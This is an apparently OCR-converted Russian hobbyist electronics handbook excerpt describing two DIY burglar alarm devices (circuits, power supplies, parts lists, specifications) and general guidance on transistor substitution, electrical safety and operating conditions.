Сетевой понижающий трансформатор питания 77 унифицированной конструкции серии ТН изготавливается на броневом магнитопроводе типа ШЛ, активная площадь поперечного сечения которого должна быть не менее 8 см2. Трансформатор, примененный в устройстве, включен по схеме, которая указана выше, на напряжение 220 В. При переключении обмоток трансформатора на напряжение 127 В необходимо подать это напряжение на выводы 1 и 3 или 4 и 6. При этом можно соединить выводы первичной обмотки 1 и 4, 3 и 6. Обмотка II с выводами 7 и 8 трансформирует напряжение 5 В переменного тока, обмотка // с выводами 9 и 10 — напряжение 5 В и обмотка // с выводами 9 и 11 — напряжение 6, 3 В.

Вместо покупного готового трансформатора питания можно применить трансформатор самодельной конструкции, моточные данные которого приведены в табл. 2. 12.

Трансформатор питания в данном устройстве обеспечивает расчетный уровень выходного выпрямленного напряжения, необходимого для питания функциональных узлов, гальваническую развязку выходных вторичных це-

Таблица 2.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в охранном устройстве с универсальным выходом

2-91.jpg

пей устройства от сети переменного тока и дополнительную электробезопасность при эксплуатации. Сетевой трансформатор T1 входит в состав БП, который конструктивно выполняется в виде самостоятельной сборочной единицы. БП имеет в своем составе выпрямительное устройство, собранное по мостовой схеме на четырех выпрямительных диодах VD1—VD4; емкостный фильтр — на конденсаторах СЗ, С5, С6; СНПТ, собранный на транзисторах VT2—VT4, VT6; ИМ. Встроенный в устройство БП обеспечивает на выходе стабилизированное напряжение 5 В. Особенностью данного БП является то, что унифицированный трансформатор питания Т1 вместе с входными цепями работает в режиме генератора тока и позволяет включить непосредственно после выпрямителя VD1—VD4 стабилитрон VD6, который создает первую ступень стабилизации выходного напряжения. Выпрямительное устройство работает на емкостный фильтр, составленный из трех электролитических конденсаторов СЗ, С5, С6; собрано по однофазной двухполупериодной мостовой схеме, которая характеризуется низким обратным напряжением на комплекте выпрямительных диодов, повышенным падением напряжения, снижающим общий кпд устройства, повышенной частотой пульсации, хорошим использованием габаритной мощности сетевого трансформатора, достаточно высоким уровнем надежности и долговечности эксплуатации, большим расходом полупроводниковых диодов, что повышает стоимость изготовления. Однотипные выпрямительные диоды нельзя устанавливать на одном радиаторе охлаждения без изоляционных прокладок. Применение одной диодной сборки типа КЦ405 вместо четырех диодов значительно упрощает технологический процесс сборки и монтажа БП. Емкостный фильтр сглаживает пульсации напряжения постоянного тока как на выходе выпрямителя, так и на выходе стабилизатора, с которого снимается 5 В. Выпрямленное напряжение постоянного тока поступает на стабилизатор напряжения, собранный по компенсационной схеме на транзисторах VT2, VT3, VT4, VT6. Управляющим элементом стабилизатора является транзистор VT4, эмиттерный переход которого использован в качестве источника опорного напряжения. РЭ стабилизатора напряжения собран на транзисторах VT2, VT3, VT6. В схеме стабилизатора работает керамический конденсатор С7, который позволяет снизить выходное сопротивление стабилизатора на высоких частотах. По существу рассматриваемый стабилизатор напряжения является второй ступенью стабилизации напряжения 5 В, которое обеспечивает электропитание микросхем. Его точное значение выставляется подбором сопротивления резистора R4, а также подбором параметров транзистора VT4.

В электрическую схему БЭ охранного устройства включены три ИМС DA1—DA3, ИМ ИП1 (или сирена), работающий при напряжении 12 В, электромагнитное реле К1, конечные переключатели или герконовые реле (магнитоуправляемые контакты), индикаторные элементы, выходные цепи.

В случае применения герконов устройство может обеспечить охрану автомобиля. С помощью геркона осуществляется ввод схемы в рабочее состояние после включения электропитания тумблером В1 и замыкания контактов переключателя S3, который устанавливается на выходной двери охраняемого объекта. Если вместо переключателя S3 используется геркон, то замыкание его контактов производится с помощью магнита. Герконовое реле в этом случае закрепляется на лобовом или боковом стекле автомобиля и включается, если прислонить магнит к стеклу с внешней стороны к тому месту, где укреплен геркон, при этом включается индикаторный светодиод. После ввода схемы в рабочее состояние при открытой двери охраняемого объекта она работает, подав команду на ИМ (или сирену) через 5...10 с. Эта задержка времени необходима для того, чтобы можно было выйти из помещения или машины и закрыть за собой дверь, а при входе — успеть отключить сигнальное устройство от сети. При установке устройства в автомашине питание его необходимо приспособить от бортовой сети. Каждая из трех ИМС включает в свой состав четыре логических элемента, обозначенных на схеме (рис. 2.9). Из первой ИМС в работе участвуют два элемента — DA1.1 и DA1.2, которые образуют RS-триггер. Логические элементы второй ИМС используются: DA2.1 — в качестве инвертора, DA2.2 — двухходового логического элемента, DA2.3 и DA2.4 — RS-триггера. Логические элементы DA3.1 и DA3.4 образуют один элемент, работающий по схеме И-НЕ, а элементы DA3.2 и DA3.3 являются триггерами.

После включения устройства в сеть переменного тока тумблером В1 напряжение питания 5 В после соответствующих преобразований и стабилизации поступает на каскад установки RS-триггеров в положение низкого уровня логического нуля. В первый момент транзистор VT12 открыт, напряжение на его коллекторе близко к напряжению логического нуля, а так как коллектор присоединен к входам всех RS-триггеров, то он устанавливается в нулевое положение. Далее происходит зарядка конденсатора С9 до напряжения стабилизированного значения, напряжение на делителе, составленном из резисторов R22 и R23, будет в конце зарядки равно нулю. Это приводит к закрытию транзистора VT12, на входах триггеров появляется напряжение, соответствующее высокому уровню логической единицы, что обеспечивает устойчивое состояние триггеров.

Подготовка устройства к подаче сигналов тревоги исполнительным механизмом завершается при замыкании контактов переключателей S1, S2 и S3. При этом на входе триггеров DA1.1 и DA1.2 установится низкий уровень логического нуля, а на выходе будет действовать сигнал высокого уровня, соответствующий логической единице. Этот сигнал через резистор R16 подается па базу транзистора VT10. Транзистор открывается, и его коллекторный ток вызывает зажигание светодиода VD9, который является сигналом готовности устройства к работе. Сигнал с выхода 3 элемента DA1.1 поступает на элемент DA2.2, подготавливая его к выдаче сигнала на второй триггер. На входе инвертора DA2.1 устанавливается высокий уровень логической единицы, задаваемый стабилизатором напряжения и снимаемый с коллектора транзистора VT2, а на выходе в это время действует низкий уровень логического нуля. Это положение принципиальной схемы является устойчивым и может продолжаться как угодно долго.

В составе БЭ охранного устройства собрано два реле времени, постоянная величина срабатывания которых определяется электрическими цепями, составленными из резисторов и конденсаторов. Первое реле времени выполнено на транзисторах VT9 и VT11 и включает цепь, состоящую из конденсатора С8 и резистора R15. Второе реле времени собрано на транзисторах VT1 и VT5 и также включает в себя электрическую цепь, состоящую из конденсатора С4 и резистора R2. Первое реле на транзисторах VT9 и VT11 срабатывает через 5 с. Этого времени достаточно для отключения сторожевого устройства от сети электропитания, чтобы оно не включило сигнал тревоги. Второе реле может быть отрегулировано на время срабатывания до 30 с, в течение которого работает ИМ.

Для того чтобы возвратить охранное устройство и все элементы схемы в исходное состояние, необходимо выключить и снова включить напряжение питания от сети переменного тока переключателем В1.

В сторожевом устройстве применены следующие покупные комплектующие ЭРЭ: сетевой понижающий трансформатор питания T1 типа ТН 10-127/220-50 броневой конструкции; ИМС DM типа К1ЛБ553, DA2 — К1ЛБ553, DA3 — К1ЛБ553; транзисторы VT1 типа КП103Е, VT2 — КТ802А, VT3 — МП39, VT4 — МП39, VT5 — КТЗ0ЗБ, VT6 — МП37А, VT7 — КТ312Б, VT8 — КТ312Б, VT9 — КП103Е, VT10 — КТ312Б, VT11 — КТ203Б, VT12 — КТ312Б; выпрямительные диоды VD1—VD4 типа Д237А, VD5 - Д223, VD7 — Д223, VD8-Д223, VD10— Д223, стабилитрон VD6 типа Д809; светодиод VD9 типа АЛ102А; конденсаторы С1 типа К40У-9-630В-0.01 мкФ, С2 К40У-9-630-0,01 мкФ, СЗ — К50-6-10В-200 мкФ, С4 -К50-6-6,3В-200 мкФ, С5 - К50-6-6,ЗВ-200 мкФ, С6 — K50-6-6.3В-200 мкФ, С7 — K10-7В-25В-Н20-0.033 мкФ, С8 — K50-6-6,3В-100 мкФ, С9 — К50-б-б.ЗВ-20 мкФ; резисторы R1 типа МЛТ-2-200 кОм, R2 - MЛT-0,25-240 кОм, R3-МЛТ-0,5-1,8 кОм, R4 — МЛТ-0,25-430 Ом, R5 — МЛТ-0,125-200 Ом, R6 — МЛТ-0,25-300 Ом, R7 - МЛТ-0,125-33 кОм, R8 - МЛТ-0,25-750 Ом, R9 — МЛТ-0,25-4,7 кОм, R10 — МЛТ 0,25-10 кОм, R11 — МЛТ-0,5-5,1 кОм, R12 — МЛТ-0,25-4,7 кОм, R13 — МЛТ-0,25-2,4 кОм, R14 — МЛТ-0,25-10 кОм, R15 — МЛТ-0,125-100 кОм, R16 — МЛТ-0,125-6,8 кОм, R17 — МЛТ-0.25-300 Ом, R18 — МЛТ-0,25-750 Ом, R19 — МЛТ-0,25-33 кОм, R20 — МЛТ-0,25-4,7 кОм, R21 — МЛТ-2-220 Ом, R22 — МЛТ-0,5-82 кОм, R23 — МЛТ-0,25-100 кОм; индикаторная лампа H1 типа ТН-0,2; предохранитель плавкий F1 типа ПМ1-1А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной до 2,3 м, Х2, ХЗ типа ОНЦ-2; переключатели В1 типа «тумблер» ТВ2-1-2, S1, S2 — КП-1, S3 — КП-2; электромагнитное реле К1 типа РЭС-9; магнитоуправляемые контакты типа РЭС-42, РЭС-55.

Электронная схема БП собирается на отдельной плате, изготавливаемой из фольгированного одностороннего гетинакса или стеклотекстолита. Монтаж, регулировка и налаживание БП производятся при отключенной в точках А и Б нагрузке. Выходное стабилизированное напряжение для электропитания ИМС должно быть выставлено до значения 5В. Это достигается подбором сопротивления резистора R4, а также подбором транзистора VT4.

Основные электрические параметры и технические характеристики охранного устройства с универсальным выходом

Номинальное напряжение питающей сети переменного тока, В ......................... .220 или 127

Номинальная частота питающей сети переменного

тока, Гц ............................ .50

Номинальное напряжение автономного источника

питания, В .......................... 5

Напряжение на выводах вторичных обмоток сетевого понижающего трансформатора Т1, В:

7 и 8 ............................ .5

9 и 10 ............................ .5

9 и 11............................ .6,3

Номинальное напряжение на выходе выпрямительного устройства в режиме холостого хода, В ... .5,5

Пределы изменения напряжения питающей сети переменного тока, при которых сохраняется устойчивая работа устройства. В ........... .180...240 или

110... 140

Пределы изменения частоты питающей сети переменного тока, Гц ................... .49,5...50,5

Коэффициент нелинейных искажений питающей -

сети переменного тока, %, не более ......... .12

Коэффициент стабилизации напряжения постоянного тока на выходе БП, не менее .......... .80

Амплитуда пульсации выпрямленного напряжения, мВ, не более ......................... .20

Мощность, потребляемая устройством во время

работы, Вт, не более ................... .80

Ток, потребляемый устройством в сторожевом режиме работы, мА, не более ............... .10

Время задержки срабатывания устройства, с, не более ............................ .6

Время работы устройства в режиме подачи сигнала тревоги, с, не более ................ .40

Количество одновременно охраняемых объектов (количество устанавливаемых конечных выключателей), шт ......................... .1...20

Среднее время наработки на отказ, ч ......... .5000

Вероятность безотказной работы устройства при риске заказчика в=0,92, не менее .......... .0,97

Срок службы устройства, ч, не менее ......... .8000

Помехозащищенность устройства при напряженности внешнего электромагнитного поля, дБ, не менее ............................ .120

кпд, %, не менее ....................... .78

ku1.jpg

Рис. 2.9. Принципиальная схема охранного устройства с универсальным выходом.

Рис. 2.9. Принципиальная схема охранного устройства с универсальным выходом.

Изображение: 

Таблица 2.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в охранном устройстве с универсальным

Изображение: 

2.1. Общие сведения

2. 1. ОБЩИЕ СВЕДЕНИЯ

За последние годы создано большое количество разнообразных электронных сторожевых устройств и электротехнических изделий охранной сигнализации, которые находят все большее распространение и применение в быту и на предприятиях. Большинство электронных устройств создают производственные кооперативы, акционерные общества, малые и совместные предприятия. Производства этих предприятий, как правило, оснащаются РЭУ в централизованном порядке. Для охраны квартир, хозяйственных и бытовых построек на приусадебных и садово-огородных участках, а также индивидуальных средств передвижения: легковых автомобилей мотоциклов, каюров, яхт и т. л. могут быть применены устройства, рассматриваемые в настоящей главе.

Эта книга дает возможность познакомиться с различными типами сторожевых устройств с сигнализацией, которые выполнены на современных комплектующих ЭРЭ, ППП и ИМС. Каждая принципиальная электрическая схема в данном справочнике сопровождается пояснениями о примененных в ней ЭРЭ, приводятся сведения о тинах ППП и ИМС, номинальные значения емкостей конденсаторов и сопротивлений резисторов. Некоторые из этих сведений дается и в тексте описаний устройств, и на принципиальных электрических схемах. Элементы подбираются при настройке и регулировке устройств или при их ремонте. Для обеспечения настройки ЭУОС рабочие режимы эксплуатации полупроводниковых изделий указываются или в специальных таблицах, или на принципиальных электрических схемах. Напряжения измеряются приборами с точностью не ниже 1, 5 класса. Некоторые значения напряжений, измеренные но переменному току, приводятся на электрических схемах на входе или на выходе соответствующих цепей и каскадов. Напряжения в контрольных точках, указанные на принципиальных схемах, могут отличаться от измеряемых па ±20%, вследствие большого разброса параметров комплектующих элементов. В справочнике приведены сведения о применяемых в рассматриваемой БРЭА транзисторах, выпускаемых отечественной промышленностью, а также рекомендации об их взаимозаменяемости. Надо сказать, что наиболее доступными и часто применяемыми транзисторами является биполярные, полевые униполярные транзисторы, п-р-п и р-n-р-структур.

Замена транзисторов без ухудшения основных электрических параметров и эксплуатационных характеристик РЭУ позволяет расширить возможности повторения этих изделий в условиях лабораторий радиолюбителей и юных техников. Методы подбора взаимозаменяемых транзисторов основаны на теоретических расчетах схем и достаточно сложны для практического применения в радиолюбительской практике. Существуют методы ориентировочных расчетов и общие правила, которыми следует руководствоваться при замене ППП.

При замене транзисторов необходимо учитывать следующие основные параметры: максимально допустимое напряжение перехода коллектор — эмиттер, ток коллектора, рассеиваемую мощность коллектора, статический коэффициент передачи тока. Заменяемый транзистор выбирается из того же ряда, что и заменяющий, и с аналогичными параметрами. В табл. 2. 1 приведены ряды взаимозаменяемых транзисторов, расположенных по группам в порядке возрастания качественных характеристик. Например, транзисторы высокочастотные расположены в порядке возрастания предельной частоты усиления, а низкочастотные — в порядке возрастания минимального значения коэффициента передачи тока. При замене транзисторов средней и большой мощности необходимо соблюдать равенство или близость параметров заменяемого и заменяющего транзисторов. Для маломощных транзисторов существует правило замены германиевых транзисторов на кремниевые соответствующей структуры

Таблица 2.1. Рекомендуемая замена транзисторов, применяющихся в сторожевых и сигнальных устройствах

2-11.jpg

Окончание табл. 2. 1

2-12.jpg

Основными параметрами выпрямительных диодов являются: предельно допустимый прямой ток, предельно допустимое обратное напряжение, обратный ток и обратное сопротивление. Конкретные значения этих параметров учитываются не только при замене отдельных диодов, но и включенных в выпрямительные устройства источников питания РЭА и РЭУ.

Наряду с УОС в быту применяется множество других РЭУ и приборов. Одновременное использование в быту разнообразной РЭА требует повышенного внимания к обеспечению ее электробезопасности и нормальному функционированию при воздействии непреднамеренных радиопомех.Границы применения, связанные с электробезопасностью, строго определены государственными стандартами и основаны на опыте работы с электроустройствами.

Несоблюдение правил техники безопасности и электробезопасности в бытовых условиях при работе ЭУОС может привести к несчастным случаям. Это предупреждение необходимо учитывать особенно тогда, когда используются самодельные РЭУ, хотя известны случаи более высокой электроопасности электрических и радиоэлектронных приборов промышленного изготовления. Важно учитывать климатические условия при эксплуатации РЭА и РЭУ, работающих от сети переменного тока высокого напряжения, и особенно тогда, когда окружающая среда имеет повышенные значения температуры и относительной влажности воздуха.

При монтаже, сборке, регулировке, настройке и ремонте ЭУОС необходимо строго соблюдать технику электробезопасности и основные приемы создания и повторения РЭА и РЭУ, рассматриваемых и данной книге. Начинать конструирование бытовых приборов и ycтройств необходимо с низковольтных схем питания, подключаемых к промышленной сети переменного тока напряжением 220 В через понижающий трансформатор питания. Вторичный источник электропитания всегда должен быть низковольтным.

Одними из главных функциональных узлов бытовых ЭУОС являются источники вторичного электропитания, которые за последнее время существенно изменились, что определяется непрерывным стремлением разработчиков СИП уменьшить их массу и габариты, повысить кпд за счет применения наиболее рациональных схем и использования высококачественного преобразования энергии переменного тока, экономичных импульсных методов регулирования, комплектующих ЭРЭ, применения ИМС, БИС. Повысились требования к питающим напряжениям промышленной сети.

Эта книга не касается теории и расчетов источников вторичного электропитания, она дает готовые схемотехнические решения, проверенные при эксплуатации разнообразной РЭА и РЭУ. При изложении материала приводятся необходимые для понимания пояснения без строгих доказательств, выводов формул и математических выкладок. В основу всех материалов справочника положены результаты обобщения опыта разработки, изготовления и эксплуатации устройств радиоэлектроники ряда организаций и предприятий. Наиболее часто находят применение автономные источники питания ЭУОС, а также комбинированные источники питания и БП, в которых используют ХИТ и промышленную сеть переменного тока напряжением 127 или 220 В частотой 50 Гц. Сведения об автономных источниках электропитания читатель найдет в специальной технической литературе.

Наилучшие результаты дает использование СИП с применением ИМС и ППП широкого употребления, качество которых предварительно проверено и обеспечено наличием ТУ. К СИП и входящим в них комплектующим ЭРИ предъявляются повышенные специальные требования, определяющие заданные значения основных электрических параметров и технических характеристик. Это — высокая надежность, долговечность и стабильность работы, оптимальная точность, высокий кпд, повышенная технологичность изготовления, сравнительно небольшая стоимость, наилучшие массогабаритные характеристики

Эксплуатация сторожевых и предупредительных устройств бытового назначения осуществляется в условиях воздействия на них разнообразных внешних факторов:

климатических, механических, радиационных, биологических, электромагнитных. Рассматриваемые электронные устройства могут применяться при воздействии повышенной или пониженной температуры окружающей среды, повышенного или пониженного атмосферного давления воздуха, повышенной относительной влажности при повышенной температуре, пыли, инея, росы, повышенной напряженности внешнего электрического или магнитного поля. Поэтому при изготовлении РЭА и РЭУ необходимо учитывать большинство внешних воздействующих факторов, категории размещения этих изделий, климатические зоны страны и высоту над уровнем моря. Ниже (в табл. 2. 2) приводятся конкретные климатические и механические нагрузки, допускаемые при эксплуатации сторожевых и сигнальных устройств, при которых обеспечивается их нормальная и устойчивая работа.

Особое внимание необходимо обратить на нормированные параметры ЭМС, которая определяется возможностью одновременно функционировать при воздействии непреднамеренных радиопомех и не создавать недопустимых радиопомех другим устройствам и приборам. Параметры и требования ЭМС определены государственными стандартами и нормами допускаемых индустриальных помех.

Важность учета электромагнитных помех при создании сторожевых и сигнальных устройств определяется также тем, что некоторые новые типы этих изделий срабатывают автоматически на определенных радиочастотах и должны быть заблокированы от самовключения.

В зависимости от климатического исполнения сторожевых устройств они могут эксплуатироваться при определенных сочетаниях внешних воздействующих факторов, не превышающих предельных значений. Сочетания относительной влажности и рабочей температуры окружающей среды приведены в табл. 2. 2.

Рабочие значения температуры используются как при создании РЭА и РЭУ, так и при их эксплуатации.

Таблица 2.2 Сочетания рабочих значений относительной влажности и температуры окружающей среды для различных климатических исполнений РЭУ

2-13.jpg

Условия эксплуатации электронных сторожевых и сигнальных устройств

Температура окружающей среды, °С

повышенная 40- 55 пониженная 0 —45

Смена температур (многократное циклическое воздействие) °С —35+ 40

Температура перегрева обмоток сетевых трансформаторов, применяемых в блоках питания РЭУ, °С

не более 60

Относительная влажность воздуха при температуре окружающей среды 25 °С табл22

Атмосферное давление воздуха

повышенное кПа (кгс/см^2) 29,7 (3)

пониженное кПа (мм рт ст ) . 53,3 (400)

Вибрационные нагрузки в диапазоне частот

52000 Гц с ускорением g (м/с^2), не более 20 (196)

Одиночные удары с ускорением, g (м/с^2),

не более 15 (147)

Мнокократные удары :

с ускорением g (м/с^2) не более 40 (392)

количество ударов не менее 1000

длительность ударов мс, не менее 0,5

Линейные нагрузки с ускорением,

g(м/с^2) 20(196)

Акустические шумы в диапозоне частот 50...10000 Гц с уровнем звукового давления ,дБ не более 120

Помехозащищенность УОС в металлическом корпусе при напряженности внешнего электромагнитного поля ,дБ не менее 120 Иней, роса, пыль, плесневые грибы по НТД и КД

Режим работы постоянный

Таблица 2.1. Рекомендуемая замена транзисторов, применяющихся в сторожевых и сигнальных устройствах (окончание)

Изображение: 

Таблица 2.1. Рекомендуемая замена транзисторов, применяющихся в сторожевых и сигнальных устройствах

Изображение: 

Таблица 2.2 Сочетания рабочих значений относительной влажности и температуры окружающей среды для различных климатических исполн

Изображение: 

2.10. Быстродействующее охранное устройство

2. 10. БЫСТРОДЕЙСТВУЮЩЕЕ ОХРАННОЕ УСТРОЙСТВО

Данное устройство со звуковой сигнализацией тревоги разработано для эксплуатации в помещениях и на открытом воздухе в условиях УХЛ и В при воздействии температуры окружающей среды от —30 до 45 °С, относительной влажности воздуха до 92%, при температуре 22 °С и атмосферном давлении воздуха от 200 до 1000 мм рт. ст. Это обеспечивается схемным решением, конструкцией устройства, технологией его изготовления и примененными ЭРИ и ЭРЭ. Рассматриваемое электронное устройство предназначено для охраны жилых и производственных помещений, офисов, складов, гаражей, приусадебных построек и других стационарных объектов, а также может быть приспособлено для охраны автомобилей и другого подвижного транспорта, в том числе и водного.

Электропитание охранного устройства осуществляется от сети переменного тока напряжением 127 и 220 В частотой 50 Гц, а также от автономных источников питания, имеющих выходное напряжение 9 В. В качестве встроенного источника питания может быть использован ХИТ или аккумуляторная батарея GB1. Охранное устройство имеет простую электронную схему, собранную из комплектующих ЭРЭ широкого применения, и достаточно простую конструкцию, это позволяет повторять его в производствах малых предприятий и акционерных обществ.

Принципиальная электрическая схема быстродействующего охранного устройства, выполненного на одной ИМС, приведена на рис. 2. 10. При промышленном изготовлении данного устройства в комплект поставки входят датчики, БП, ХИТ, БЭ, блок громкоговорителей и монтажный комплект. При изготовлении охранного устройства в условиях радиолюбительской лаборатории можно рекомендовать для монтажа два блока: БП и БЭ.

Блок питания включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостную нагрузку и выполненный на одной диодной сборке, ПСН, выходную цепь для подключения ХИТ.

Входное устройство обеспечивает подключение к сети переменного тока с помощью электрического соединителя XI типа «вилка»; подключение к автономному источнику питания постоянного тока с помощью малогабаритных приборных контактных зажимов Х2, ХЗ; защиту первичных цепей охранного устройства от перегрузок и коротких замыканий и индикацию о готовности устройства к работе с помощью неоновой лампы тлеющего разряда H1.

В этом устройстве применен сетевой понижающий трансформатор питания Т1, который изготавливается на броневом ленточном магнитопроводе типа ШЛМ с уменьшенным расходом меди. Трансформатор выбран из унифицированного ряда «Габарит» и характеризуется высокими электромагнитными параметрами и технико-экономическими характеристиками. Трансформатор имеет одну катушку, установленную на центральном стержне магнитопровода, активная площадь поперечного сечения стали которого равна 6, 25 см2. На каркас катушки намотано пять обмоток: две первичные и три вторичные. Первичные обмотки намотаны на одну технологическую операцию сдвоенным проводом, имеющим повышенную прочность изоляционного покрытия. Между первичными и вторичными обмотками уложен слой медного эмалированного провода, один конец которого заземлен, а второй изолирован. На вторичных обмотках трансформатора действует напряжение переменного тока 6, 3 (выводы 7 и 8); 5, 0 (выводы 9 и 10) ; 6,3 (выводы 9 и 11);

5,0 (выводы 12 и 13); 6,3 В (выводы 12 и 14). Всем этим характеристикам отвечает покупной трансформатор типоразмера ТН24-127/220-50.

Выходной понижающий трансформатор питания Т1 обеспечивает расчетный уровень выходного выпрямленного напряжения, гальваническую развязку вторичных цепей охранного устройства от сети переменного тока высокого напряжения и дополнительную электробезопасность при его эксплуатации, регулировке и ремонте. Габаритная мощность сетевого трансформатора при полной нагрузке составляет 55... 60 Вт. В устройстве может быть применен самодельный сетевой трансформатор питания с параметрами и моточными данными, приведенными в табл. 2. 13.

В качестве выпрямителя в устройстве применена диодная сборка VD1, которая выполнена из четырех выпрямительных диодов по однофазной двухполупериодной схеме. Такой выпрямитель можно устанавливать непосредственно на металлический радиатор без изоляционных прокладок, он характеризуется законченностью конструктивно-технологического оформления, оптимальными малогабаритными свойствами, простотой применения в схеме устройства, улучшенными электрическими параметрами: повышенной частотой пульсации выпрямленного напряжения, достаточно малым значением обратного напряжения на комплекте диодов, хорошим использованием габаритной мощности трансформатора и возможностью работы без трансформатора. Но недостаток этой схемы — повышенное падение напряжения.

Напряжение, снимаемое со вторичной обмотки трансформатора (выводы 7 и 11), поступает на диодную сборку, выпрямляется и затем сглаживается емкостным фильтром, собранным на оксидных электролитических конденсаторах С1 и С2. Конденсатор СЗ служит для фильтрации высокочастотных помех.

Таблица 2.13. Моточные данные сетевою понижающею трансформатора питания Т1, примененного в быстродействующем охранном устройстве

2-101.jpg

Выпрямленное напряжение постоянного тока подается на ПСН, в котором транзистор VT1 усиливает выходную мощность БП. В базу транзистора включен резистор R2, регулирующий выходное стабилизированное напряжение в пределах от 2 до 12 В, которое при регулировке контролируется вольтметром PV1.

В качестве автономного источника питания GB1 может быть применена батарея из сухих элементов МЦ-системы, аккумуляторная батарея любой системы или аккумулятор, используемый для питания бортовой сети подвижного транспорта с выходным номинальным напряжением 12 В. При работе охранного устройства от сети переменного тока автономный источник питания отключается. Максимальная нагрузка на выходе БП не должна превышать 1А.

Конструктивно БП рекомендуется выполнить в виде самостоятельной сборочной единицы, в отдельном корпусе с соответствующими переходными электрическими кабелями, необходимыми для подключения к сети переменного тока, электронному блоку и звуковому сигна-

лизатору. Правильно собранный БП не требует дополнительной регулировки и налаживания. Перечень применяемых в устройстве покупных комплектующих ЭРИ и ЭРЭ и рекомендации по их возможной замене приведены в табл.2.14. Защита БП от перегрузок и коротких замыкании, возникающих при неправильном монтаже выходных цепей, обеспечивается двумя плавкими предохранителями F1 и F2.

Электронный блок сигнализации охранного устройства собран на одной ИМС и двух транзисторах, имеющих соответствующие цени управления. ИМС DA1 включает в себя четыре логических элемента 2И-НЕ и образует генератор прямоугольных импульсон (выводы 4...10); реле времени (выводы 1...3); устройство согласования входного сопротивления усилителя звуковой частоты и генератора.

Таблица 2.14. Перечень основных комплектующих ЭРИ и ЭРЭ, примененных в быстродействующем охранном устройстве

2-102.jpg

Окончание табл. 2.14

2-103.jpg

В охранном устройстве контакты переключателей S4 и S5 замкнуты, а контакты переключателей S1—S3, устанавливаемые на дверях, окнах, форточках, капотах и т. д.,— разомкнуты. Схема находится в обесточенном состоянии и в ждущем режиме работы. Вместо переключателей S4 и S6 могут быть применены магнитоуправляемые контакты — герконы. При открывании дверей контакты переключателей S1—S3 замыкаются и напряжение питания от стабилизатора или от автономного источника питания подается через диод VD3 на транзистор VT3, включенный в цепь усилителя звуковой частоты. Это же напряжение поступает на второй ПСН, собранный на стабилитроне VD8 и резисторе R5 и питающий микросхему. Конденсатор С5 начинает заряжаться с момента открывания дверей и замыкания контактов переключателей S1—S3 или одного из них. Время зарядки конденсатора С5 определяется величиной сопротивления резистора R13. После зарядки конденсатора С5 напряжение на входе первого элемента ИМС (выводы 1 и 2) достигнет низкого уровня логического нуля, a на его выходе (вывод 3) появится высокий уровень логической единицы, соответствующий напряжению 9 В. Часть этого напряжения, равного 5...7 В, через выпрямительный диод VD9 и ДН, собранный на резисторах R6 и R7, подводится к входу второго элемента ИМС (вывод 5). Все это приводит к самовозбуждению генератора прямоугольных импульсов. Цепь задающей частоты образована конденсатором С6, резистором R9 и транзистором VT2.

Электронная схема устройства работает, когда включены контакты переключателей S4, S6. Это происходит одновременно с замыканием контактов переключателей S1—S3. В этом случае контакты переключателя S5 разомкнуты. Напряжение питания через замкнутые контакты и выпрямительный диод VD4 поступает в цепь сигнализации, а через диод VD5 и резистор R3 — на конденсатор С4. Как только напряжение на этом конденсаторе достигнет определенного заданного значения, срабатывает второй элемент ИМС DA1, генератор начинает вырабатывать импульсы — сигналы тревоги. Частота следования сигналов постепенно нарастает по мере зарядки конденсатора С4 до максимального значения и в результате плавного уменьшения сопротивления транзистора VT2. Громкость подаваемого сигнала тревоги регулируется резистором R11.

Изготавливается быстродействующее охранное устройство в виде двух блоков в корпусах прямоугольной конструкции, имеющих лицевые панели и крышки, в которых предусматриваются вентиляционные отверстия. Монтаж ЭРИ и ЭРЭ производится печатным способом на плате из фольгированного одностороннего гетинакса или стеклотекстолита толщиной до 2 мм.

Сетевой трансформатор Т1, диодная сборка VD1 и мощные транзисторы VT1 и VT3 устанавливаются отдельно на металлическом шасси и радиаторе охлаждения. На лицевых панелях БП и БЭ размещают органы управления, ИП PV1, разъемы электрических соединителей, приборные контактные зажимы и держатели предохранителей F1 и F2. Все электрические соединители выполняются или способом печатного монтажа, или отрезками тонкого монтажного провода, имеющего надежную изоляцию. Достаточная простота схемно-технического решения позволяет монтировать охранное устройство в условиях радиолюбительской лаборатории и не требует сложной настройки и регулировки.

В данном электронном охранном устройстве применены покупные комплектующие ЭРЭ широкого назначения, большинство из которых имеет соответствующие зарубежные аналоги. В качестве измерительного вольтметра может быть использован покупной прибор типа М4231-40 или любой другой вольтметр постоянного тока, рассчитанный на измерение напряжения до 20 В. Можно применить электрические соединители типа ОНЦ-ВГ, СЩ-5, СГ-5, СНО, СНЦ, РПМ.

При монтаже и эксплуатации этого охранного устройства необходимо соблюдать правила электробезопасности. Надо помнить, что источник переменного напряжения имеет высокое опасное для жизни напряжение — 220 В.

Основные электрические параметры и технические характеристики быстродействующего охранного устройства

Номинальное напряжение питающей сети переменного тока, В ....................... .220 или 127

Номинальная частота питающей сети переменного тока, Гц ........................ .50

Номинальное напряжение автономного или внешнего источника питания постоянного тока, В ... .12

Пределы изменения напряжения питающей сети неременного тока, В .................... .180...240 или 110...140

Пределы изменения частоты питающей сети переменного тока, % ................... .±1

Пределы изменения напряжения автономного источника питания, при которых сохраняется устойчивая работа устройства, В ........... .8,5...14

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12

Регулируемое выходное стабилизированное напряжение БП, В ......................... .2...12

Нестабильность выходного напряжения постоянного тока, %, не более ..................... . 0, 1

Амплитуда пульсации выходного напряжения

постоянного тока,мВ, не более ............. 5

Напряжение вторичной стабилизации, В ........ 5

Коэффициент стабилизации напряжения постоянного тока

, не менее .................... 100

Время срабатывания устройства при размыкании контактов, с, не более:

S1- S3 .......................... 50

S4. S6 .......................... 1

Генерируемая частота звукового сигнала при

работе устройств, Гц ................... 1100

Количество одновременно охраняемых объектов, шт . 2...10 Уровень давления звукового сигнала при полной мощноти и на расстоянии 1 м от источникя звука, дБ, не более ......................... 110

Mощность, потребляемая устройством в дежурном

режиме работы, мВт, не более ............. 20

Мощность, потребляемая устройством при срабатывании звукового сигнала, Вт ............. 20

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ, не менее . 100 Сопротивление изоляции токоведущих частей устройства относительно металлического корпуса, МОм, не менее .................... 15

Масса устройства в комплекте, кг ............ 1,6

кпд, %, не менее ........................ 80

Срок службы устройства, ч ................. 5000

